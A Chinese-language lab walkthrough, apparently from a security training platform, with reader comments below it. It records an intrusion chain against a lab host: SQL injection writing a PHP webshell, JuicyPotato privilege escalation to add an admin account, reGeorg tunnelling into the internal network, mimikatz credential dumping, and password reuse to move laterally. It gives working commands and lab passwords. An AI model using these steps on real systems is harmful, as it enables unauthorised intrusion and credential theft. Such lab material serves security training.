1.使用sql注入: ?id=1 and 1=2,报错显示出php绝对路径:C:\phpStudy\WWW\index.php
2.使用sql注入: ?id=1 order by 2 ,得知其只有两个字段
3.使用sql注入: ?id=1.1 union select 1,2 得知注入点在第二个字段
4.使用sql注入: ?id=1.1 union select 1,’’ into outfile ‘C:\phpStudy\WWW\LSP.php’ 将一句话木马文件输出文件至LSP.php中(把一句话木马写在第一个字段内也可,只要让php文件有一句话木马就行)
5.访问 http://afsgr16-b1ferw.aqlab.cn/lsp.php?8=phpinfo(); 写入成功
6.上菜刀,成功
7.查询身份,发现只是test用户,需要提权
8.用systeminfo查询主机信息,得知其操作系统为Windows Server 2008 R2,在VMware虚拟机中运行,有2个补丁,IP地址为10.0.1.4,DHCP服务器IP为10.0.1.1
9.上传烂土豆JuicyPotato.exe至目标主机,改名为123.exe,执行123.exe -p “net user aaa 123qwe!<span>@#</span> /add” 和123.exe -p “net localgroup administrators aaa /add”,添加一个管理员账号aaa,密码123qwe!<span>@##CTL{n}://nc0.cdn.zkaq.cn/md/10863/69f457eb0cdd05ff4d047e185761575d_90364.png" alt="">“
10.用netstat -nao | find “3389”查看是否打开3389端口,发现存在
11.尝试远程登录,发现远端是server 2003,非目标主机,说明目标主机IP被路由器映射走了。
12.使用内网代理工具reGeorg入侵
【reGeorg原理整理】
考虑一种场景,资产组里有2台机器:主机A、主机B。其中主机A上运行了Web服务,且IP或者端口映射到公网,可以被外部人员访问,主机B是在外网访问不到的。攻击者通过漏洞在主机A上传了Webshell,但同时又出于某些限制并未能得到主机A的主机权限也无法反弹shell,那么他这个时候,也是无法通过常规方法反弹shell或者直接登录主机A从而访问到主机B的。
reGeorg就在这个时候起了作用,攻击者已经有了主机A的webshell权限(即可以在web服务器中上传文件),而主机A可以和主机B通信。那么在主机A上安装reGeorg工具,使得攻击者发出的请求以及目标机器的响应经过A的http转发,达到攻击者可以和主机B进行通信的效果。
如图:
(1)向目标主机上传tunnel.nosocket.php文件,改为123.php,执行后显示如图
(2)在攻击主机上运行py -2 reGeorgSocksProxy.py -p 10086 -u http://afsgr16-b1ferw.aqlab.cn/123.php,让代理监听起来,监听端口10086
(3)使用Proxifier,修改代理服务器、代理规则,只让远程桌面程序mstsc.exe流量走代理,防止影响网络。如图:
(4)从第8步可知目标内网ip为10.0.1.4,用此IP远程桌面连接走起
13.向目标主机上传mimikatz.exe,用管理员打开,privilege::debug提权,用sakurlsa::logonpasswords获取登录密码。
可得知administrator用户密码为woshifengge1. ,admin用户密码为A1B2C3!.Nf 。可尝试用此密码来撞库
14.在目标主机运行arp -a,得到10.0.1.0网段内还存在其他主机,尝试远程登录
15.在10.0.1.8用administrator密码woshifengge1.撞库登录成功,获得flag
16.在10.0.1.8上用获取信息,得知其在zkaq.cn域内,dns指向为10.0.1.6(大概率为域控)
打赏我,让我更有动力~
© 2016 - 2024 掌控者 All Rights Reserved.
test_707
发表于 2022-2-17
好文666
评论列表
加载数据中...
徐浩洋
发表于 2022-2-20
狠狠地爱住了,赞一个
感谢大哥分享
评论列表
加载数据中...